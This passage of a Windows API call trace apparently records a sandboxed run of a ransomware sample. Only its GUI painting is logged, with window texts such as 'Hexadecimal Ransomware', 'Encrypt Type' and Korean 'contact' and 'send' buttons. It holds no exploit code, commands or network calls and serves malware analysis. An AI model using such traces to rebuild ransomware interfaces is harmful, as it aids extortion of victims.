dx=0x0, dy=0x0, order=0x0) returned 0x0 [0161.713] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=92, height=18, combineMode=0x0) returned 0x0 [0161.713] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0161.713] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0161.713] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe7cc) returned 0x0 [0161.713] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ae8 [0161.713] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551ae8) returned 0x0 [0161.713] LocalFree (hMem=0x1551ae8) returned 0x0 [0161.713] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0161.714] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0161.714] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0161.714] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe7c0) returned 0x0 [0161.714] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe7ec) returned 0x0 [0161.714] GetWindowTextLengthW (hWnd=0x102d2) returned 12 [0161.715] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xc [0161.715] GetSystemMetrics (nIndex=42) returned 0 [0161.715] GetWindowTextW (in: hWnd=0x102d2, lpString=0x11fe6ec, nMaxCount=13 | out: lpString="Encrypt Type") returned 12 [0161.715] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xd, wParam=0xd, lParam=0x11fe6ec) returned 0xc [0161.715] GetClientRect (in: hWnd=0x102d2, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0161.715] GdipCreateRegion (region=0x11fe608) returned 0x0 [0161.715] GdipGetClip (graphics=0x6e19d10, region=0x6e1a2e0) returned 0x0 [0161.715] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0161.715] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0161.715] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe620) returned 0x0 [0161.715] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ce0 [0161.716] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ce0) returned 0x0 [0161.716] LocalFree (hMem=0x1551ce0) returned 0x0 [0161.716] GdipCombineRegionRegion (region=0x6e1a2e0, region2=0x6e19ff0, combineMode=0x1) returned 0x0 [0161.716] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ce0 [0161.716] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ce0) returned 0x0 [0161.716] LocalFree (hMem=0x1551ce0) returned 0x0 [0161.716] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0161.716] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe648) returned 0x0 [0161.716] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe638) returned 0x0 [0161.716] GdipGetRegionHRgn (region=0x6e1a2e0, graphics=0x6e19d10, hRgn=0x11fe638) returned 0x0 [0161.716] GdipDeleteRegion (region=0x6e1a2e0) returned 0x0 [0161.716] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe650) returned 0x0 [0161.716] GetCurrentObject (hdc=0x14010816, type=0x1) returned 0xb00017 [0161.716] GetCurrentObject (hdc=0x14010816, type=0x2) returned 0x900010 [0161.716] GetCurrentObject (hdc=0x14010816, type=0x7) returned 0x8050815 [0161.717] GetCurrentObject (hdc=0x14010816, type=0x6) returned 0x8a01c2 [0161.717] SaveDC (hdc=0x14010816) returned 1 [0161.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x8040822 [0161.717] GetClipRgn (hdc=0x14010816, hrgn=0x8040822) returned 0 [0161.717] SelectClipRgn (hdc=0x14010816, hrgn=0x9040825) returned 2 [0161.717] DeleteObject (ho=0x8040822) returned 1 [0161.717] DeleteObject (ho=0x9040825) returned 1 [0161.717] OffsetViewportOrgEx (in: hdc=0x14010816, x=0, y=0, lppt=0x33349ec | out: lppt=0x33349ec) returned 1 [0161.717] GetNearestColor (hdc=0x14010816, color=0x800000) returned 0x800000 [0161.717] CreateSolidBrush (color=0x800000) returned 0x7100826 [0161.717] FillRect (hDC=0x14010816, lprc=0x11fe654, hbr=0x7100826) returned 1 [0161.718] DeleteObject (ho=0x7100826) returned 1 [0161.718] RestoreDC (hdc=0x14010816, nSavedDC=-1) returned 1 [0161.718] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010816) returned 0x0 [0161.718] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdb50dbd) returned 0x0 [0161.718] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0161.718] GetWindowTextLengthW (hWnd=0x102d2) returned 12 [0161.718] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xc [0161.718] GetSystemMetrics (nIndex=42) returned 0 [0161.718] GetWindowTextW (in: hWnd=0x102d2, lpString=0x11fe6ec, nMaxCount=13 | out: lpString="Encrypt Type") returned 12 [0161.718] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xd, wParam=0xd, lParam=0x11fe6ec) returned 0xc [0161.718] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe670) returned 0x0 [0161.718] GetCurrentObject (hdc=0x14010816, type=0x1) returned 0xb00017 [0161.718] GetCurrentObject (hdc=0x14010816, type=0x2) returned 0x900010 [0161.719] GetCurrentObject (hdc=0x14010816, type=0x7) returned 0x8050815 [0161.719] GetCurrentObject (hdc=0x14010816, type=0x6) returned 0x8a01c2 [0161.719] SaveDC (hdc=0x14010816) returned 1 [0161.719] GetNearestColor (hdc=0x14010816, color=0x800000) returned 0x800000 [0161.719] RestoreDC (hdc=0x14010816, nSavedDC=-1) returned 1 [0161.719] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010816) returned 0x0 [0161.720] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0161.720] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0161.742] GdipGetTextRenderingHint (graphics=0x6e19d10, mode=0x11fe610) returned 0x0 [0161.742] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5fc) returned 0x0 [0161.742] GetCurrentObject (hdc=0x14010816, type=0x1) returned 0xb00017 [0161.742] GetCurrentObject (hdc=0x14010816, type=0x2) returned 0x900010 [0161.742] GetCurrentObject (hdc=0x14010816, type=0x7) returned 0x8050815 [0161.742] GetCurrentObject (hdc=0x14010816, type=0x6) returned 0x8a01c2 [0161.742] SaveDC (hdc=0x14010816) returned 1 [0161.743] GetTextAlign (hdc=0x14010816) returned 0x0 [0161.743] GetTextColor (hdc=0x14010816) returned 0x0 [0161.744] SetTextColor (hdc=0x14010816, color=0x2b0000) returned 0x0 [0161.744] GetCurrentObject (hdc=0x14010816, type=0x6) returned 0x8a01c2 [0161.744] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0161.744] SelectObject (hdc=0x14010816, h=0x4f0a07d0) returned 0x8a01c2 [0161.744] GetBkMode (hdc=0x14010816) returned 2 [0161.745] SetBkMode (hdc=0x14010816, mode=1) returned 2 [0161.745] DrawTextExW (in: hdc=0x14010816, lpchText="Encrypt Type", cchText=12, lprc=0x11fe590, format=0x100000, lpdtp=0x3334eb0 | out: lpchText="Encrypt Type", lprc=0x11fe590) returned 18 [0161.751] RestoreDC (hdc=0x14010816, nSavedDC=-1) returned 1 [0161.751] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010816) returned 0x0 [0161.751] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7ac) returned 0x0 [0161.751] BitBlt (hdc=0x10105d6, x=0, y=0, cx=94, cy=18, hdcSrc=0x14010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0161.752] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010816) returned 0x0 [0161.752] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0161.752] SelectObject (hdc=0x14010816, h=0x85000f) returned 0x8050815 [0161.752] DeleteDC (hdc=0x14010816) returned 1 [0161.752] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0161.752] EndPaint (hWnd=0x102d2, lpPaint=0x11fe750) returned 1 [0161.752] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.752] IsWindowUnicode (hWnd=0x102d4) returned 1 [0161.752] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.753] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.753] DispatchMessageW (lpMsg=0x11fed00) returned 0x1 [0161.753] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0xf, wParam=0x0, lParam=0x0) returned 0x1 [0161.753] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x1 [0161.753] SetTextColor (hdc=0xf0105ee, color=0x0) returned 0x0 [0161.753] SetBkColor (hdc=0xf0105ee, color=0xffffff) returned 0xffffff [0161.754] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fdd74 | out: lpwndpl=0x11fdd74) returned 1 [0161.754] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdd20 | out: lpRect=0x11fdd20) returned 1 [0161.754] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.754] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.754] GetSystemMetrics (nIndex=42) returned 0 [0161.754] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdbc8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.754] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdbc8) returned 0x16 [0161.754] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdc28 | out: lpRect=0x11fdc28) returned 1 [0161.754] GetCurrentObject (hdc=0x1801081f, type=0x1) returned 0xb00017 [0161.754] GetCurrentObject (hdc=0x1801081f, type=0x2) returned 0x900010 [0161.755] GetCurrentObject (hdc=0x1801081f, type=0x7) returned 0x3050821 [0161.755] GetCurrentObject (hdc=0x1801081f, type=0x6) returned 0x8a01c2 [0161.755] SaveDC (hdc=0x1801081f) returned 1 [0161.755] GetNearestColor (hdc=0x1801081f, color=0x0) returned 0x0 [0161.755] CreateSolidBrush (color=0x0) returned 0x8100826 [0161.755] FillRect (hDC=0x1801081f, lprc=0x11fdac8, hbr=0x8100826) returned 1 [0161.755] DeleteObject (ho=0x8100826) returned 1 [0161.755] RestoreDC (hdc=0x1801081f, nSavedDC=-1) returned 1 [0161.755] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.755] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.756] GetSystemMetrics (nIndex=42) returned 0 [0161.756] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdb68, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.756] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdb68) returned 0x16 [0161.756] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdbc8 | out: lpRect=0x11fdbc8) returned 1 [0161.756] GetCurrentObject (hdc=0x1801081f, type=0x1) returned 0xb00017 [0161.756] GetCurrentObject (hdc=0x1801081f, type=0x2) returned 0x900010 [0161.756] GetCurrentObject (hdc=0x1801081f, type=0x7) returned 0x3050821 [0161.756] GetCurrentObject (hdc=0x1801081f, type=0x6) returned 0x8a01c2 [0161.756] SaveDC (hdc=0x1801081f) returned 1 [0161.756] GetNearestColor (hdc=0x1801081f, color=0x0) returned 0x0 [0161.756] CreateSolidBrush (color=0x0) returned 0x9100826 [0161.756] FillRect (hDC=0x1801081f, lprc=0x11fda68, hbr=0x9100826) returned 1 [0161.756] DeleteObject (ho=0x9100826) returned 1 [0161.756] RestoreDC (hdc=0x1801081f, nSavedDC=-1) returned 1 [0161.756] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.757] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.757] GetSystemMetrics (nIndex=42) returned 0 [0161.757] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdb68, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.757] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdb68) returned 0x16 [0161.758] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x14, wParam=0xf0105ee, lParam=0x0) returned 0x1 [0161.759] SetTextColor (hdc=0x1901081f, color=0x0) returned 0x0 [0161.759] SetBkColor (hdc=0x1901081f, color=0xffffff) returned 0xffffff [0161.904] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.904] IsWindowUnicode (hWnd=0x102d6) returned 1 [0161.904] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.905] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.905] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.905] BeginPaint (in: hWnd=0x102d6, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0xf0105ee [0161.905] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.906] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0161.906] CreateCompatibleDC (hdc=0xf0105ee) returned 0xe010812 [0161.906] SelectObject (hdc=0xe010812, h=0x8050815) returned 0x85000f [0161.906] GdipCreateFromHDC (hdc=0xe010812, graphics=0x11fe76c) returned 0x0 [0161.906] GdipTranslateWorldTransform (graphics=0x6e19d10, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0161.906] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=60, height=18, combineMode=0x0) returned 0x0 [0161.906] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0161.906] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0161.906] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe7cc) returned 0x0 [0161.906] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0161.906] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551a08) returned 0x0 [0161.906] LocalFree (hMem=0x1551a08) returned 0x0 [0161.907] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0161.907] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0161.907] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0161.907] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe7c0) returned 0x0 [0161.907] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe7ec) returned 0x0 [0161.907] GetWindowTextLengthW (hWnd=0x102d6) returned 4 [0161.907] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0161.907] GetSystemMetrics (nIndex=42) returned 0 [0161.907] GetWindowTextW (in: hWnd=0x102d6, lpString=0x11fe6fc, nMaxCount=5 | out: lpString="문의하기") returned 4 [0161.907] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xd, wParam=0x5, lParam=0x11fe6fc) returned 0x4 [0161.907] GetClientRect (in: hWnd=0x102d6, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0161.907] GdipCreateRegion (region=0x11fe608) returned 0x0 [0161.907] GdipGetClip (graphics=0x6e19d10, region=0x6e1a2e0) returned 0x0 [0161.907] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0161.908] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0161.908] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe620) returned 0x0 [0161.908] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ce0 [0161.908] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ce0) returned 0x0 [0161.908] LocalFree (hMem=0x1551ce0) returned 0x0 [0161.908] GdipCombineRegionRegion (region=0x6e1a2e0, region2=0x6e19ff0, combineMode=0x1) returned 0x0 [0161.908] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x15518b8 [0161.908] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x15518b8) returned 0x0 [0161.908] LocalFree (hMem=0x15518b8) returned 0x0 [0161.908] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0161.908] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe648) returned 0x0 [0161.908] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe638) returned 0x0 [0161.908] GdipGetRegionHRgn (region=0x6e1a2e0, graphics=0x6e19d10, hRgn=0x11fe638) returned 0x0 [0161.908] GdipDeleteRegion (region=0x6e1a2e0) returned 0x0 [0161.908] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe650) returned 0x0 [0161.908] GetCurrentObject (hdc=0xe010812, type=0x1) returned 0xb00017 [0161.908] GetCurrentObject (hdc=0xe010812, type=0x2) returned 0x900010 [0161.909] GetCurrentObject (hdc=0xe010812, type=0x7) returned 0x8050815 [0161.909] GetCurrentObject (hdc=0xe010812, type=0x6) returned 0x8a01c2 [0161.909] SaveDC (hdc=0xe010812) returned 1 [0161.909] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xc040825 [0161.909] GetClipRgn (hdc=0xe010812, hrgn=0xc040825) returned 0 [0161.909] SelectClipRgn (hdc=0xe010812, hrgn=0xd040822) returned 2 [0161.909] DeleteObject (ho=0xc040825) returned 1 [0161.909] DeleteObject (ho=0xd040822) returned 1 [0161.909] OffsetViewportOrgEx (in: hdc=0xe010812, x=0, y=0, lppt=0x3335960 | out: lppt=0x3335960) returned 1 [0161.909] GetNearestColor (hdc=0xe010812, color=0xdb7093) returned 0xdb7093 [0161.910] CreateSolidBrush (color=0xdb7093) returned 0xa100826 [0161.910] FillRect (hDC=0xe010812, lprc=0x11fe654, hbr=0xa100826) returned 1 [0161.910] DeleteObject (ho=0xa100826) returned 1 [0161.910] RestoreDC (hdc=0xe010812, nSavedDC=-1) returned 1 [0161.910] GdipReleaseDC (graphics=0x6e19d10, hdc=0xe010812) returned 0x0 [0161.910] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdb30dbd) returned 0x0 [0161.910] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0161.910] GetWindowTextLengthW (hWnd=0x102d6) returned 4 [0161.910] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0161.910] GetSystemMetrics (nIndex=42) returned 0 [0161.910] GetWindowTextW (in: hWnd=0x102d6, lpString=0x11fe6fc, nMaxCount=5 | out: lpString="문의하기") returned 4 [0161.910] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xd, wParam=0x5, lParam=0x11fe6fc) returned 0x4 [0161.910] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe670) returned 0x0 [0161.910] GetCurrentObject (hdc=0xe010812, type=0x1) returned 0xb00017 [0161.910] GetCurrentObject (hdc=0xe010812, type=0x2) returned 0x900010 [0161.910] GetCurrentObject (hdc=0xe010812, type=0x7) returned 0x8050815 [0161.911] GetCurrentObject (hdc=0xe010812, type=0x6) returned 0x8a01c2 [0161.911] SaveDC (hdc=0xe010812) returned 1 [0161.911] GetNearestColor (hdc=0xe010812, color=0xffffff) returned 0xffffff [0161.911] RestoreDC (hdc=0xe010812, nSavedDC=-1) returned 1 [0161.911] GdipReleaseDC (graphics=0x6e19d10, hdc=0xe010812) returned 0x0 [0161.914] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0161.914] GdipGetTextRenderingHint (graphics=0x6e19d10, mode=0x11fe610) returned 0x0 [0161.914] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5fc) returned 0x0 [0161.915] GetCurrentObject (hdc=0xe010812, type=0x1) returned 0xb00017 [0161.915] GetCurrentObject (hdc=0xe010812, type=0x2) returned 0x900010 [0161.915] GetCurrentObject (hdc=0xe010812, type=0x7) returned 0x8050815 [0161.915] GetCurrentObject (hdc=0xe010812, type=0x6) returned 0x8a01c2 [0161.915] SaveDC (hdc=0xe010812) returned 1 [0161.915] GetTextAlign (hdc=0xe010812) returned 0x0 [0161.916] GetTextColor (hdc=0xe010812) returned 0x0 [0161.916] SetTextColor (hdc=0xe010812, color=0xffffff) returned 0x0 [0161.916] GetCurrentObject (hdc=0xe010812, type=0x6) returned 0x8a01c2 [0161.916] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0161.916] SelectObject (hdc=0xe010812, h=0x4f0a07d0) returned 0x8a01c2 [0161.916] GetBkMode (hdc=0xe010812) returned 2 [0161.916] SetBkMode (hdc=0xe010812, mode=1) returned 2 [0161.916] DrawTextExW (in: hdc=0xe010812, lpchText="문의하기", cchText=4, lprc=0x11fe590, format=0x100000, lpdtp=0x3335e18 | out: lpchText="문의하기", lprc=0x11fe590) returned 18 [0161.935] RestoreDC (hdc=0xe010812, nSavedDC=-1) returned 1 [0161.935] GdipReleaseDC (graphics=0x6e19d10, hdc=0xe010812) returned 0x0 [0161.936] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7ac) returned 0x0 [0161.936] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=60, cy=18, hdcSrc=0xe010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0161.936] GdipReleaseDC (graphics=0x6e19d10, hdc=0xe010812) returned 0x0 [0161.936] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0161.936] SelectObject (hdc=0xe010812, h=0x85000f) returned 0x8050815 [0161.936] DeleteDC (hdc=0xe010812) returned 1 [0161.937] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0161.937] EndPaint (hWnd=0x102d6, lpPaint=0x11fe750) returned 1 [0161.937] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.937] IsWindowUnicode (hWnd=0x102d8) returned 1 [0161.937] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.937] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.937] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.938] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0xf0105ee [0161.938] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.938] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x14, wParam=0xf0105ee, lParam=0x0) returned 0x1 [0161.938] GetStockObject (i=5) returned 0x900015 [0161.938] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0161.938] CreateCompatibleDC (hdc=0xf0105ee) returned 0x11010812 [0161.938] SelectObject (hdc=0x11010812, h=0x8050815) returned 0x85000f [0161.938] GdipCreateFromHDC (hdc=0x11010812, graphics=0x11fe760) returned 0x0 [0161.939] GdipTranslateWorldTransform (graphics=0x6e19d10, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0161.939] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0161.939] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0161.939] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0161.939] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe7c0) returned 0x0 [0161.939] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x15518b8 [0161.939] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x15518b8) returned 0x0 [0161.939] LocalFree (hMem=0x15518b8) returned 0x0 [0161.939] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0161.939] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0161.939] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0161.939] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe7b4) returned 0x0 [0161.939] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe7e0) returned 0x0 [0161.940] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdb10dbd) returned 0x0 [0161.940] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0161.941] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x11fe664, fWinIni=0x0 | out: pvParam=0x11fe664) returned 1 [0161.942] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5cc) returned 0x0 [0161.942] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0161.942] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0161.942] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0161.942] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0161.942] SaveDC (hdc=0x11010812) returned 1 [0161.942] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.942] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.943] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.943] GetNearestColor (hdc=0x11010812, color=0x989898) returned 0x989898 [0161.943] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.943] GetNearestColor (hdc=0x11010812, color=0x7f7f7f) returned 0x7f7f7f [0161.943] GetNearestColor (hdc=0x11010812, color=0x989898) returned 0x989898 [0161.943] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.943] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0161.943] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0161.943] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0161.961] IsAppThemed () returned 0x1 [0161.962] GetThemeAppProperties () returned 0x3 [0161.962] OpenThemeData () returned 0x10004 [0161.962] IsAppThemed () returned 0x1 [0161.962] GetThemeAppProperties () returned 0x3 [0161.962] GetThemeAppProperties () returned 0x3 [0162.195] GdipGetFamilyName (in: family=0x58e8170, name=0x11fe388, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0162.195] GetDeviceCaps (hdc=0x450107b6, index=90) returned 96 [0162.195] CoTaskMemAlloc (cb=0x5c) returned 0x1544cf8 [0162.195] CreateFontIndirectW (lplf=0x1544cf8) returned 0x170a07ff [0162.195] CoTaskMemFree (pv=0x1544cf8) [0162.195] GetObjectW (in: h=0x170a07ff, c=92, pv=0x11fe34c | out: pv=0x11fe34c) returned 92 [0162.196] SelectObject (hdc=0x450107b6, h=0x170a07ff) returned 0x790a0536 [0162.196] GetMapMode (hdc=0x450107b6) returned 1 [0162.196] GetTextMetricsW (in: hdc=0x450107b6, lptm=0x11fe37c | out: lptm=0x11fe37c) returned 1 [0162.196] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x102415, lpdtp=0x3336acc | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0162.435] IsAppThemed () returned 0x1 [0162.435] GetThemeAppProperties () returned 0x3 [0162.435] GetThemeAppProperties () returned 0x3 [0162.436] IsAppThemed () returned 0x1 [0162.436] GetThemeAppProperties () returned 0x3 [0162.436] GetThemeAppProperties () returned 0x3 [0162.436] GetFocus () returned 0x102d8 [0162.483] IsAppThemed () returned 0x1 [0162.484] GetThemeAppProperties () returned 0x3 [0162.484] GetThemeAppProperties () returned 0x3 [0162.484] IsAppThemed () returned 0x1 [0162.484] GetThemeAppProperties () returned 0x3 [0162.484] GetThemeAppProperties () returned 0x3 